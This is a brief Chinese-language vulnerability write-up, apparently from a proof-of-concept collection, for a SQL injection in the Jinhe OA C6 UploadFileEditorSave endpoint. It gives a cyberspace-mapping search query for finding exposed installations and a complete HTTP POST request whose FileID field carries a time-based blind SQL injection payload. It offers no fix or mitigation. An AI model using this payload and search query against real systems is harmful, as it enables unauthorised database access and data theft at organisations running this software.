0x01 漏洞名称
金和OA-C6-UploadFileEditorSave SQL注入
0x02 漏洞介绍
用金和OA-C6-UploadFileEditorSave.aspx接口存在SQL注入漏洞,攻击者可以通过此接口执行sql命令。
0x03 影响范围
金和OA
0x04 网络空间测绘查询
body="c6/Jhsoft.Web.login"
0x05 漏洞复现
POST /C6/Control/UploadFileEditor.aspx HTTP/1.1
Host: 11.11.11.11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
FileID=1';WAITFOR+DELAY'0:0:8'--+